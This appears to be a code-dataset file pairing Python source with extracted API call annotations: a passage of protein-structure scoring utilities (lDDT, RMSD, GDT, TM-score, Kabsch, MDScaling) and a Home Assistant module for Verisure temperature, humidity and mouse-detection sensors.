        # fix mirrors by (-1)*Z if more (+) than (-) phi angles.
        # bugfix: index this struct's ratio - comparing the whole array
        # raised "truth value is ambiguous" for batch > 1 (the torch
        # sibling `mdscaling_torch` already indexes per struct)
        if phi_ratios[i] < 0.5:
            preds[i, -1] = (-1) * preds[i, -1]
            if verbose == 2:
                print("Corrected mirror in struct no.", i)
    return preds, stresses
def lddt_ca_torch(true_coords, pred_coords, cloud_mask, r_0=15.):
    """ Computes the lddt score for each C_alpha.
        https://academic.oup.com/bioinformatics/article/29/21/2722/195896
        Inputs:
        * true_coords: (b, l, c, d) in sidechainnet format.
        * pred_coords: (b, l, c, d) in sidechainnet format.
        * cloud_mask : (b, l, c) adapted for scn format.
        * r_0: float. maximum inclusion radius in reference struct.
        Outputs:
        * (b, l) lddt for c_alpha scores (ranging between 0 and 1)
        See wrapper below.
    """
    device, dtype = true_coords.device, true_coords.type()
    # tolerance thresholds from the lDDT paper; a pair scores one point
    # per threshold its deviation stays under (max 4)
    thresholds = torch.tensor([0.5, 1, 2, 4], device=device).type(dtype)
    # adapt masks
    cloud_mask = cloud_mask.bool().cpu()
    c_alpha_mask = torch.zeros(cloud_mask.shape[1:], device=device).bool() # doesn't have batch dim
    # atom index 1 is the C-alpha slot in the scn 14-atom layout
    c_alpha_mask[..., 1] = True
    # container for c_alpha scores (between 0,1)
    wrapper = torch.zeros(true_coords.shape[:2], device=device).type(dtype)
    for bi, seq in enumerate(true_coords):
        # select atoms for study
        c_alphas = cloud_mask[bi]*c_alpha_mask # only pick c_alpha positions
        selected_pred = pred_coords[bi, c_alphas, :]
        selected_target = true_coords[bi, c_alphas, :]
        # get number under distance
        dist_mat_pred = torch.cdist(selected_pred, selected_pred, p=2)
        dist_mat_target = torch.cdist(selected_target, selected_target, p=2)
        # only pairs within r_0 in the REFERENCE struct are scored
        under_r0_target = dist_mat_target < r_0
        compare_dists = torch.abs(dist_mat_pred - dist_mat_target)[under_r0_target]
        # measure diff below threshold
        score = torch.zeros_like(under_r0_target).float()
        max_score = torch.zeros_like(under_r0_target).float()
        max_score[under_r0_target] = 4.
        # measure under how many thresholds: bucketize returns the number of
        # thresholds the deviation EXCEEDS, so 4 - bucket = points earned
        score[under_r0_target] = thresholds.shape[0] - \
                                 torch.bucketize( compare_dists, boundaries=thresholds ).float()
        # dont include diagonal: the self-pair always earns the full 4
        # points, so subtract thresholds.shape[0] from both num and denom
        l_mask = c_alphas.float().sum(dim=-1).bool()
        wrapper[bi, l_mask] = ( score.sum(dim=-1) - thresholds.shape[0] ) / \
                              ( max_score.sum(dim=-1) - thresholds.shape[0] )
    return wrapper
################
### WRAPPERS ###
################
@set_backend_kwarg
@invoke_torch_or_numpy(mdscaling_torch, mdscaling_numpy)
def MDScaling(pre_dist_mat, **kwargs):
    """ Gets distance matrix (-ces). Outputs 3d.
        Assumes (for now) distrogram is (N x N) and symmetric.
        For support of ditograms: see `center_distogram_torch()`
        Inputs:
        * pre_dist_mat: (1, N, N) distance matrix.
        * weights: optional. (N x N) pairwise relative weights .
        * iters: number of iterations to run the algorithm on
        * tol: relative tolerance at which to stop the algorithm if no better
               improvement is achieved
        * backend: one of ["numpy", "torch", "auto"] for backend choice
        * fix_mirror: int. number of iterations to run the 3d generation and
                      pick the best mirror (highest number of negative phis)
        * N_mask: indexing array/tensor for indices of backbone N.
                  Only used if fix_mirror > 0.
        * CA_mask: indexing array/tensor for indices of backbone C_alpha.
                   Only used if fix_mirror > 0.
        * verbose: whether to print logs
        Outputs:
        * best_3d_coords: (3 x N)
        * historic_stress: (timesteps, )
    """
    # this body only normalizes the args; the decorator chain dispatches
    # them to mdscaling_torch / mdscaling_numpy based on `backend`
    pre_dist_mat = expand_dims_to(pre_dist_mat, 3 - len(pre_dist_mat.shape))
    return pre_dist_mat, kwargs
@expand_arg_dims(dim_len = 2)
@set_backend_kwarg
@invoke_torch_or_numpy(kabsch_torch, kabsch_numpy)
def Kabsch(A, B):
    """ Returns Kabsch-rotated matrices resulting
        from aligning A into B.
        Adapted from: https://github.com/charnley/rmsd/
        * Inputs:
        * A,B are (3 x N)
        * backend: one of ["numpy", "torch", "auto"] for backend choice
        * Outputs: tensor/array of shape (3 x N)
    """
    # run calcs - pick the 0th bc an additional dim was created
    # (the decorator chain forwards (A, B) to kabsch_torch / kabsch_numpy)
    return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(rmsd_torch, rmsd_numpy)
def RMSD(A, B):
    """ Returns RMSD score as defined here (lower is better):
        https://en.wikipedia.org/wiki/
        Root-mean-square_deviation_of_atomic_positions
        * Inputs:
        * A,B are (B x 3 x N) or (3 x N)
        * backend: one of ["numpy", "torch", "auto"] for backend choice
        * Outputs: tensor/array of size (B,)
    """
    # the decorator chain forwards (A, B) to rmsd_torch / rmsd_numpy
    return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(gdt_torch, gdt_numpy)
def GDT(A, B, *, mode="TS", cutoffs=[1,2,4,8], weights=None):
    """ Returns GDT score as defined here (higher is better):
        Supports both TS and HA
        http://predictioncenter.org/casp12/doc/help.html
        * Inputs:
        * A,B are (B x 3 x N) (np.array or torch.tensor)
        * mode: "TS" or "HA" (case-insensitive "ha" accepted). selects the
                threshold set - NOT the backend; use the `backend` kwarg
                handled by the decorator for that.
        * cutoffs: ignored - always overwritten from `mode` below.
        * weights: list containing the weights (one per threshold)
        * Outputs: tensor/array of size (B,)
    """
    # define cutoffs for each type of gdt and weights
    cutoffs = [0.5,1,2,4] if mode in ["HA", "ha"] else [1,2,4,8]
    # calculate GDT (the decorator dispatches to gdt_torch / gdt_numpy)
    return A, B, cutoffs, {'weights': weights}
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(tmscore_torch, tmscore_numpy)
def TMscore(A, B):
    """ Returns TMscore as defined here (higher is better):
        >0.5 (likely) >0.6 (highly likely) same folding.
        = 0.2. https://en.wikipedia.org/wiki/Template_modeling_score
        Warning! It's not exactly the code in:
        https://zhanglab.ccmb.med.umich.edu/TM-score/TMscore.cpp
        but will suffice for now.
        Inputs:
        * A,B are (B x 3 x N) (np.array or torch.tensor)
        * mode: one of ["numpy", "torch", "auto"] for backend
        Outputs: tensor/array of size (B,)
    """
    # the decorator chain forwards (A, B) to tmscore_torch / tmscore_numpy
    return A, B
| [
"numpy.random.rand",
"torch.sin",
"torch.det",
"torch.searchsorted",
"torch.cdist",
"torch.min",
"numpy.array",
"torch.cos",
"numpy.linalg.norm",
"numpy.arange",
"torch.logical_or",
"numpy.mean",
"numpy.cross",
"torch.mean",
"einops.repeat",
"torch.logical_not",
"functools.wraps",
... | [((641, 660), 'sidechainnet.utils.sequence.ProteinVocabulary', 'ProteinVocabulary', ([], {}), '()\n', (658, 660), False, 'from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP\n'), ((842, 898), 'torch.linspace', 'torch.linspace', (['(2)', '(20)'], {'steps': 'constants.DISTOGRAM_BUCKETS'}), '(2, 20, steps=constants.DISTOGRAM_BUCKETS)\n', (856, 898), False, 'import torch\n'), ((1059, 1091), 'torch.cdist', 'torch.cdist', (['coords', 'coords'], {'p': '(2)'}), '(coords, coords, p=2)\n', (1070, 1091), False, 'import torch\n'), ((1109, 1171), 'torch.linspace', 'torch.linspace', (['(2)', '(20)'], {'steps': 'num_buckets', 'device': 'coords.device'}), '(2, 20, steps=num_buckets, device=coords.device)\n', (1123, 1171), False, 'import torch\n'), ((1204, 1247), 'torch.bucketize', 'torch.bucketize', (['distances', 'boundaries[:-1]'], {}), '(distances, boundaries[:-1])\n', (1219, 1247), False, 'import torch\n'), ((1422, 1431), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (1427, 1431), False, 'from functools import wraps\n'), ((3088, 3109), 'sidechainnet.structure.build_info.SC_BUILD_INFO.items', 'SC_BUILD_INFO.items', ([], {}), '()\n', (3107, 3109), False, 'from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO\n'), ((3335, 3347), 'numpy.zeros', 'np.zeros', (['(14)'], {}), '(14)\n', (3343, 3347), True, 'import numpy as np\n'), ((3677, 3689), 'numpy.zeros', 'np.zeros', (['(14)'], {}), '(14)\n', (3685, 3689), True, 'import numpy as np\n'), ((4654, 4725), 'os.system', 'os.system', (['f"""curl https://files.rcsb.org/download/{name}.pdb > {route}"""'], {}), "(f'curl https://files.rcsb.org/download/{name}.pdb > {route}')\n", (4663, 4725), False, 'import os\n'), ((5225, 5246), 'mdtraj.load_pdb', 'mdtraj.load_pdb', (['name'], {}), '(name)\n', (5240, 5246), False, 'import mdtraj\n'), ((6776, 6802), 'numpy.newaxis', 'np.newaxis', (['coords'], {'axis': '(0)'}), '(coords, axis=0)\n', (6786, 6802), True, 'import 
numpy as np\n'), ((7198, 7225), 'mdtraj.load_pdb', 'mdtraj.load_pdb', (['pdb_destin'], {}), '(pdb_destin)\n', (7213, 7225), False, 'import mdtraj\n'), ((7772, 7804), 'torch.zeros', 'torch.zeros', (['cloud_mask.shape', '(3)'], {}), '(cloud_mask.shape, 3)\n', (7783, 7804), False, 'import torch\n'), ((14153, 14181), 'torch.cat', 'torch.cat', (['batch_mask'], {'dim': '(0)'}), '(batch_mask, dim=0)\n', (14162, 14181), False, 'import torch\n'), ((14937, 14979), 'einops.rearrange', 'rearrange', (['wrapper', '"""... l c -> ... (l c)"""'], {}), "(wrapper, '... l c -> ... (l c)')\n", (14946, 14979), False, 'from einops import rearrange, repeat\n'), ((15752, 15782), 'torch.cat', 'torch.cat', (['batch_tokens'], {'dim': '(0)'}), '(batch_tokens, dim=0)\n', (15761, 15782), False, 'import torch\n'), ((16420, 16445), 'torch.zeros_like', 'torch.zeros_like', (['adj_mat'], {}), '(adj_mat)\n', (16436, 16445), False, 'import torch\n'), ((17981, 18047), 'torch.zeros', 'torch.zeros', (['seqs.shape[0]', '(seqs.shape[1] * 14)', '(seqs.shape[1] * 14)'], {}), '(seqs.shape[0], seqs.shape[1] * 14, seqs.shape[1] * 14)\n', (17992, 18047), False, 'import torch\n'), ((18112, 18142), 'torch.zeros', 'torch.zeros', (['seqs.shape[1]', '(14)'], {}), '(seqs.shape[1], 14)\n', (18123, 18142), False, 'import torch\n'), ((20086, 20113), 'torch.cross', 'torch.cross', (['ba', 'cb'], {'dim': '(-1)'}), '(ba, cb, dim=-1)\n', (20097, 20113), False, 'import torch\n'), ((20129, 20161), 'torch.cross', 'torch.cross', (['n_plane', 'cb'], {'dim': '(-1)'}), '(n_plane, cb, dim=-1)\n', (20140, 20161), False, 'import torch\n'), ((20177, 20221), 'torch.stack', 'torch.stack', (['[cb, n_plane_, n_plane]'], {'dim': '(-1)'}), '([cb, n_plane_, n_plane], dim=-1)\n', (20188, 20221), False, 'import torch\n'), ((20237, 20277), 'torch.norm', 'torch.norm', (['rotate'], {'dim': '(-2)', 'keepdim': '(True)'}), '(rotate, dim=-2, keepdim=True)\n', (20247, 20277), False, 'import torch\n'), ((21850, 21910), 'einops.rearrange', 'rearrange', 
(['backbones', '"""b (l back) d -> b l back d"""'], {'l': 'length'}), "(backbones, 'b (l back) d -> b l back d', l=length)\n", (21859, 21910), False, 'from einops import rearrange, repeat\n'), ((25278, 25298), 'numpy.arange', 'np.arange', (['shape[-2]'], {}), '(shape[-2])\n', (25287, 25298), True, 'import numpy as np\n'), ((26661, 26673), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (26670, 26673), True, 'import numpy as np\n'), ((27228, 27272), 'torch.stack', 'torch.stack', (['[svd[0] for svd in svds]'], {'dim': '(0)'}), '([svd[0] for svd in svds], dim=0)\n', (27239, 27272), False, 'import torch\n'), ((27281, 27325), 'torch.stack', 'torch.stack', (['[svd[1] for svd in svds]'], {'dim': '(0)'}), '([svd[1] for svd in svds], dim=0)\n', (27292, 27325), False, 'import torch\n'), ((27334, 27378), 'torch.stack', 'torch.stack', (['[svd[2] for svd in svds]'], {'dim': '(0)'}), '([svd[2] for svd in svds], dim=0)\n', (27345, 27378), False, 'import torch\n'), ((35352, 35388), 'numpy.transpose', 'np.transpose', (['pred_coords', '(0, 2, 1)'], {}), '(pred_coords, (0, 2, 1))\n', (35364, 35388), True, 'import numpy as np\n'), ((37677, 37693), 'numpy.linalg.svd', 'np.linalg.svd', (['C'], {}), '(C)\n', (37690, 37693), True, 'import numpy as np\n'), ((37910, 37922), 'numpy.dot', 'np.dot', (['V', 'W'], {}), '(V, W)\n', (37916, 37922), True, 'import numpy as np\n'), ((1983, 1992), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (1988, 1992), False, 'from functools import wraps\n'), ((2428, 2437), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (2433, 2437), False, 'from functools import wraps\n'), ((10236, 10251), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10249, 10251), False, 'import torch\n'), ((11355, 11370), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (11368, 11370), False, 'import torch\n'), ((15144, 15165), 'torch.nonzero', 'torch.nonzero', (['N_mask'], {}), '(N_mask)\n', (15157, 15165), False, 'import torch\n'), ((15167, 15189), 'torch.nonzero', 
'torch.nonzero', (['CA_mask'], {}), '(CA_mask)\n', (15180, 15189), False, 'import torch\n'), ((15191, 15212), 'torch.nonzero', 'torch.nonzero', (['C_mask'], {}), '(C_mask)\n', (15204, 15212), False, 'import torch\n'), ((22099, 22156), 'einops.repeat', 'repeat', (['predicted[:, :, -1]', '"""b l d -> b l scn d"""'], {'scn': '(10)'}), "(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)\n", (22105, 22156), False, 'from einops import rearrange, repeat\n'), ((22198, 22255), 'einops.repeat', 'repeat', (['new_coords[:, :, 1]', '"""b l d -> b l scn d"""'], {'scn': '(10)'}), "(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)\n", (22204, 22255), False, 'from einops import rearrange, repeat\n'), ((24782, 24813), 'torch.cumsum', 'torch.cumsum', (['distogram'], {'dim': '(-1)'}), '(distogram, dim=-1)\n', (24794, 24813), False, 'import torch\n'), ((26685, 26730), 'torch.tensor', 'torch.tensor', (['([np.inf] * batch)'], {'device': 'device'}), '([np.inf] * batch, device=device)\n', (26697, 26730), False, 'import torch\n'), ((27185, 27206), 'torch.svd_lowrank', 'torch.svd_lowrank', (['mi'], {}), '(mi)\n', (27202, 27206), False, 'import torch\n'), ((27841, 27870), 'torch.ones_like', 'torch.ones_like', (['pre_dist_mat'], {}), '(pre_dist_mat)\n', (27856, 27870), False, 'import torch\n'), ((28527, 28559), 'torch.norm', 'torch.norm', (['coords'], {'dim': '(-1, -2)'}), '(coords, dim=(-1, -2))\n', (28537, 28559), False, 'import torch\n'), ((29029, 29068), 'torch.transpose', 'torch.transpose', (['best_3d_coords', '(-1)', '(-2)'], {}), '(best_3d_coords, -1, -2)\n', (29044, 29068), False, 'import torch\n'), ((29069, 29092), 'torch.stack', 'torch.stack', (['his'], {'dim': '(0)'}), '(his, dim=0)\n', (29080, 29092), False, 'import torch\n'), ((29433, 29459), 'numpy.ones_like', 'np.ones_like', (['pre_dist_mat'], {}), '(pre_dist_mat)\n', (29445, 29459), True, 'import numpy as np\n'), ((29696, 29710), 'numpy.ones', 'np.ones', (['batch'], {}), '(batch)\n', (29703, 29710), True, 'import numpy as 
np\n'), ((29892, 29983), 'numpy.linalg.norm', 'np.linalg.norm', (['(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :])'], {'axis': '(-3)'}), '(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :\n ], axis=-3)\n', (29906, 29983), True, 'import numpy as np\n'), ((30441, 30478), 'numpy.linalg.norm', 'np.linalg.norm', (['coords'], {'axis': '(-1, -2)'}), '(coords, axis=(-1, -2))\n', (30455, 30478), True, 'import numpy as np\n'), ((30999, 31012), 'numpy.array', 'np.array', (['his'], {}), '(his)\n', (31007, 31012), True, 'import numpy as np\n'), ((36822, 36834), 'torch.svd', 'torch.svd', (['C'], {}), '(C)\n', (36831, 36834), False, 'import torch\n'), ((36882, 36901), 'torch.linalg.svd', 'torch.linalg.svd', (['C'], {}), '(C)\n', (36898, 36901), False, 'import torch\n'), ((37958, 37973), 'numpy.dot', 'np.dot', (['X_.T', 'U'], {}), '(X_.T, U)\n', (37964, 37973), True, 'import numpy as np\n'), ((39258, 39280), 'torch.cdist', 'torch.cdist', (['X', 'X'], {'p': 'p'}), '(X, X, p=p)\n', (39269, 39280), False, 'import torch\n'), ((39320, 39342), 'torch.cdist', 'torch.cdist', (['Y', 'Y'], {'p': 'p'}), '(Y, Y, p=p)\n', (39331, 39342), False, 'import torch\n'), ((39855, 39894), 'torch.mean', 'torch.mean', (['((X - Y) ** 2)'], {'axis': '(-1, -2)'}), '((X - Y) ** 2, axis=(-1, -2))\n', (39865, 39894), False, 'import torch\n'), ((40007, 40043), 'numpy.mean', 'np.mean', (['((X - Y) ** 2)'], {'axis': '(-1, -2)'}), '((X - Y) ** 2, axis=(-1, -2))\n', (40014, 40043), True, 'import numpy as np\n'), ((41076, 41095), 'numpy.array', 'np.array', (['[weights]'], {}), '([weights])\n', (41084, 41095), True, 'import numpy as np\n'), ((45207, 45253), 'torch.cdist', 'torch.cdist', (['selected_pred', 'selected_pred'], {'p': '(2)'}), '(selected_pred, selected_pred, p=2)\n', (45218, 45253), False, 'import torch\n'), ((45280, 45330), 'torch.cdist', 'torch.cdist', (['selected_target', 'selected_target'], {'p': '(2)'}), '(selected_target, selected_target, p=2)\n', (45291, 45330), False, 
'import torch\n'), ((14744, 14777), 'torch.zeros', 'torch.zeros', (['*scn_seq.shape', 'n_aa'], {}), '(*scn_seq.shape, n_aa)\n', (14755, 14777), False, 'import torch\n'), ((17077, 17103), 'torch.zeros_like', 'torch.zeros_like', (['attr_mat'], {}), '(attr_mat)\n', (17093, 17103), False, 'import torch\n'), ((18174, 18194), 'torch.nonzero', 'torch.nonzero', (['scaff'], {}), '(scaff)\n', (18187, 18194), False, 'import torch\n'), ((21772, 21821), 'torch.zeros', 'torch.zeros', (['batch', 'length', 'NUM_COORDS_PER_RES', '(3)'], {}), '(batch, length, NUM_COORDS_PER_RES, 3)\n', (21783, 21821), False, 'import torch\n'), ((22306, 22335), 'torch.logical_not', 'torch.logical_not', (['cloud_mask'], {}), '(cloud_mask)\n', (22323, 22335), False, 'import torch\n'), ((24951, 24986), 'torch.min', 'torch.min', (['central', 'max_bin_allowed'], {}), '(central, max_bin_allowed)\n', (24960, 24986), False, 'import torch\n'), ((25707, 25747), 'torch.zeros_like', 'torch.zeros_like', (['central'], {'device': 'device'}), '(central, device=device)\n', (25723, 25747), False, 'import torch\n'), ((27552, 27591), 'torch.transpose', 'torch.transpose', (['best_3d_coords', '(-1)', '(-2)'], {}), '(best_3d_coords, -1, -2)\n', (27567, 27591), False, 'import torch\n'), ((28480, 28511), 'torch.matmul', 'torch.matmul', (['B', 'best_3d_coords'], {}), '(B, best_3d_coords)\n', (28492, 28511), False, 'import torch\n'), ((29734, 29761), 'numpy.random.rand', 'np.random.rand', (['batch', '(3)', 'N'], {}), '(batch, 3, N)\n', (29748, 29761), True, 'import numpy as np\n'), ((30397, 30425), 'numpy.matmul', 'np.matmul', (['best_3d_coords', 'B'], {}), '(best_3d_coords, B)\n', (30406, 30425), True, 'import numpy as np\n'), ((33718, 33751), 'torch.logical_or', 'torch.logical_or', (['N_mask', 'CA_mask'], {}), '(N_mask, CA_mask)\n', (33734, 33751), False, 'import torch\n'), ((36964, 36976), 'torch.det', 'torch.det', (['V'], {}), '(V)\n', (36973, 36976), False, 'import torch\n'), ((36979, 36991), 'torch.det', 'torch.det', 
(['W'], {}), '(W)\n', (36988, 36991), False, 'import torch\n'), ((37115, 37133), 'torch.matmul', 'torch.matmul', (['V', 'W'], {}), '(V, W)\n', (37127, 37133), False, 'import torch\n'), ((37751, 37767), 'numpy.linalg.det', 'np.linalg.det', (['V'], {}), '(V)\n', (37764, 37767), True, 'import numpy as np\n'), ((37770, 37786), 'numpy.linalg.det', 'np.linalg.det', (['W'], {}), '(W)\n', (37783, 37786), True, 'import numpy as np\n'), ((41535, 41550), 'numpy.cbrt', 'np.cbrt', (['(L - 15)'], {}), '(L - 15)\n', (41542, 41550), True, 'import numpy as np\n'), ((41839, 41854), 'numpy.cbrt', 'np.cbrt', (['(L - 15)'], {}), '(L - 15)\n', (41846, 41854), True, 'import numpy as np\n'), ((42691, 42722), 'torch.nonzero', 'torch.nonzero', (['(phi_ratios < 0.5)'], {}), '(phi_ratios < 0.5)\n', (42704, 42722), False, 'import torch\n'), ((44511, 44554), 'torch.tensor', 'torch.tensor', (['[0.5, 1, 2, 4]'], {'device': 'device'}), '([0.5, 1, 2, 4], device=device)\n', (44523, 44554), False, 'import torch\n'), ((44646, 44694), 'torch.zeros', 'torch.zeros', (['cloud_mask.shape[1:]'], {'device': 'device'}), '(cloud_mask.shape[1:], device=device)\n', (44657, 44694), False, 'import torch\n'), ((44822, 44871), 'torch.zeros', 'torch.zeros', (['true_coords.shape[:2]'], {'device': 'device'}), '(true_coords.shape[:2], device=device)\n', (44833, 44871), False, 'import torch\n'), ((45404, 45446), 'torch.abs', 'torch.abs', (['(dist_mat_pred - dist_mat_target)'], {}), '(dist_mat_pred - dist_mat_target)\n', (45413, 45446), False, 'import torch\n'), ((8614, 8644), 'Bio.SeqIO.parse', 'SeqIO.parse', (['filename', '"""fasta"""'], {}), "(filename, 'fasta')\n", (8625, 8644), False, 'from Bio import SeqIO\n'), ((24877, 24913), 'torch.searchsorted', 'torch.searchsorted', (['cum_dist', 'medium'], {}), '(cum_dist, medium)\n', (24895, 24913), False, 'import torch\n'), ((27611, 27634), 'torch.stack', 'torch.stack', (['his'], {'dim': '(0)'}), '(his, dim=0)\n', (27622, 27634), False, 'import torch\n'), ((28051, 28099), 
'torch.cdist', 'torch.cdist', (['best_3d_coords', 'best_3d_coords'], {'p': '(2)'}), '(best_3d_coords, best_3d_coords, p=2)\n', (28062, 28099), False, 'import torch\n'), ((30264, 30276), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (30273, 30276), True, 'import numpy as np\n'), ((30278, 30290), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (30287, 30290), True, 'import numpy as np\n'), ((36709, 36737), 'torch.__version__.split', 'torch.__version__.split', (['"""."""'], {}), "('.')\n", (36732, 36737), False, 'import torch\n'), ((39395, 39417), 'torch.ones_like', 'torch.ones_like', (['Y_mat'], {}), '(Y_mat)\n', (39410, 39417), False, 'import torch\n'), ((40391, 40414), 'torch.tensor', 'torch.tensor', (['[weights]'], {}), '([weights])\n', (40403, 40414), False, 'import torch\n'), ((45519, 45552), 'torch.zeros_like', 'torch.zeros_like', (['under_r0_target'], {}), '(under_r0_target)\n', (45535, 45552), False, 'import torch\n'), ((45581, 45614), 'torch.zeros_like', 'torch.zeros_like', (['under_r0_target'], {}), '(under_r0_target)\n', (45597, 45614), False, 'import torch\n'), ((20555, 20578), 'torch.matmul', 'torch.matmul', (['rotate', 'd'], {}), '(rotate, d)\n', (20567, 20578), False, 'import torch\n'), ((24590, 24623), 'torch.tensor', 'torch.tensor', (['(n_bins.shape[0] - 1)'], {}), '(n_bins.shape[0] - 1)\n', (24602, 24623), False, 'import torch\n'), ((27413, 27432), 'torch.diag_embed', 'torch.diag_embed', (['s'], {}), '(s)\n', (27429, 27432), False, 'import torch\n'), ((31545, 31572), 'torch.cross', 'torch.cross', (['u2', 'u3'], {'dim': '(-1)'}), '(u2, u3, dim=-1)\n', (31556, 31572), False, 'import torch\n'), ((31617, 31644), 'torch.cross', 'torch.cross', (['u1', 'u2'], {'dim': '(-1)'}), '(u1, u2, dim=-1)\n', (31628, 31644), False, 'import torch\n'), ((31646, 31673), 'torch.cross', 'torch.cross', (['u2', 'u3'], {'dim': '(-1)'}), '(u2, u3, dim=-1)\n', (31657, 31673), False, 'import torch\n'), ((32176, 32201), 'numpy.cross', 'np.cross', (['u2', 'u3'], {'axis': 
'(-1)'}), '(u2, u3, axis=-1)\n', (32184, 32201), True, 'import numpy as np\n'), ((32243, 32268), 'numpy.cross', 'np.cross', (['u1', 'u2'], {'axis': '(-1)'}), '(u1, u2, axis=-1)\n', (32251, 32268), True, 'import numpy as np\n'), ((32270, 32295), 'numpy.cross', 'np.cross', (['u2', 'u3'], {'axis': '(-1)'}), '(u2, u3, axis=-1)\n', (32278, 32295), True, 'import numpy as np\n'), ((45797, 45850), 'torch.bucketize', 'torch.bucketize', (['compare_dists'], {'boundaries': 'thresholds'}), '(compare_dists, boundaries=thresholds)\n', (45812, 45850), False, 'import torch\n'), ((13530, 13581), 'einops.rearrange', 'rearrange', (['coords', '"""... (l c) d -> ... l c d"""'], {'c': '(14)'}), "(coords, '... (l c) d -> ... l c d', c=14)\n", (13539, 13581), False, 'from einops import rearrange, repeat\n'), ((20331, 20347), 'torch.cos', 'torch.cos', (['theta'], {}), '(theta)\n', (20340, 20347), False, 'import torch\n'), ((20371, 20387), 'torch.sin', 'torch.sin', (['theta'], {}), '(theta)\n', (20380, 20387), False, 'import torch\n'), ((20390, 20404), 'torch.cos', 'torch.cos', (['chi'], {}), '(chi)\n', (20399, 20404), False, 'import torch\n'), ((20428, 20444), 'torch.sin', 'torch.sin', (['theta'], {}), '(theta)\n', (20437, 20444), False, 'import torch\n'), ((20447, 20461), 'torch.sin', 'torch.sin', (['chi'], {}), '(chi)\n', (20456, 20461), False, 'import torch\n'), ((23051, 23097), 'torch.tensor', 'torch.tensor', (["BB_BUILD_INFO['BONDLENS']['c-o']"], {}), "(BB_BUILD_INFO['BONDLENS']['c-o'])\n", (23063, 23097), False, 'import torch\n'), ((23166, 23215), 'torch.tensor', 'torch.tensor', (["BB_BUILD_INFO['BONDANGS']['ca-c-o']"], {}), "(BB_BUILD_INFO['BONDANGS']['ca-c-o'])\n", (23178, 23215), False, 'import torch\n'), ((23284, 23304), 'torch.tensor', 'torch.tensor', (['(-np.pi)'], {}), '(-np.pi)\n', (23296, 23304), False, 'import torch\n'), ((31500, 31536), 'torch.norm', 'torch.norm', (['u2'], {'dim': '(-1)', 'keepdim': '(True)'}), '(u2, dim=-1, keepdim=True)\n', (31510, 31536), False, 'import 
torch\n'), ((32125, 32167), 'numpy.linalg.norm', 'np.linalg.norm', (['u2'], {'axis': '(-1)', 'keepdims': '(True)'}), '(u2, axis=-1, keepdims=True)\n', (32139, 32167), True, 'import numpy as np\n'), ((35643, 35663), 'numpy.ones_like', 'np.ones_like', (['N_mask'], {}), '(N_mask)\n', (35655, 35663), True, 'import numpy as np\n')] |
"""
Interfaces with Verisure sensors.
For more details about this platform, please refer to the documentation at
documentation at https://home-assistant.io/components/verisure/
"""
import logging
from homeassistant.components.verisure import HUB as hub
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up Verisure thermometer, hygrometer and mouse-detection sensors."""
    devices = []
    if int(hub.config.get('thermometers', '1')):
        hub.update_climate()
        for status in hub.climate_status.values():
            if getattr(status, 'temperature', None):
                devices.append(VerisureThermometer(status.id))
    if int(hub.config.get('hygrometers', '1')):
        hub.update_climate()
        for status in hub.climate_status.values():
            if getattr(status, 'humidity', None):
                devices.append(VerisureHygrometer(status.id))
    if int(hub.config.get('mouse', '1')):
        hub.update_mousedetection()
        for status in hub.mouse_status.values():
            # is this if needed?
            if getattr(status, 'amountText', None):
                devices.append(VerisureMouseDetection(status.deviceLabel))
    add_devices(devices)
class VerisureThermometer(Entity):
    """A temperature reading from a Verisure climate device."""

    def __init__(self, device_id):
        """Remember the id used to look the device up in the hub."""
        self._id = device_id

    @property
    def name(self):
        """Return the name of the device."""
        location = hub.climate_status[self._id].location
        return '{} {}'.format(location, "Temperature")

    @property
    def state(self):
        """Return the temperature, with the trailing degree character removed."""
        return hub.climate_status[self._id].temperature[:-1]

    @property
    def available(self):
        """Return True if entity is available."""
        return hub.available

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity."""
        return TEMP_CELSIUS

    def update(self):
        """Refresh climate data from the hub."""
        hub.update_climate()
class VerisureHygrometer(Entity):
    """A humidity reading from a Verisure climate device."""

    def __init__(self, device_id):
        """Remember the id used to look the device up in the hub."""
        self._id = device_id

    @property
    def name(self):
        """Return the name of the sensor."""
        location = hub.climate_status[self._id].location
        return '{} {}'.format(location, "Humidity")

    @property
    def state(self):
        """Return the humidity, with the trailing percent character removed."""
        return hub.climate_status[self._id].humidity[:-1]

    @property
    def available(self):
        """Return True if entity is available."""
        return hub.available

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this sensor."""
        return "%"

    def update(self):
        """Refresh climate data from the hub."""
        hub.update_climate()
class VerisureMouseDetection(Entity):
    """A mouse-detection counter from a Verisure device."""

    def __init__(self, device_id):
        """Remember the device label used to look the detector up in the hub."""
        self._id = device_id

    @property
    def name(self):
        """Return the name of the sensor."""
        location = hub.mouse_status[self._id].location
        return '{} {}'.format(location, "Mouse")

    @property
    def state(self):
        """Return the detection count reported by the hub."""
        return hub.mouse_status[self._id].count

    @property
    def available(self):
        """Return True if entity is available."""
        return hub.available

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this sensor."""
        return "Mice"

    def update(self):
        """Refresh mouse-detection data from the hub."""
        hub.update_mousedetection()
| [
"logging.getLogger",
"homeassistant.components.verisure.HUB.climate_status.values",
"homeassistant.components.verisure.HUB.mouse_status.values",
"homeassistant.components.verisure.HUB.config.get",
"homeassistant.components.verisure.HUB.update_climate",
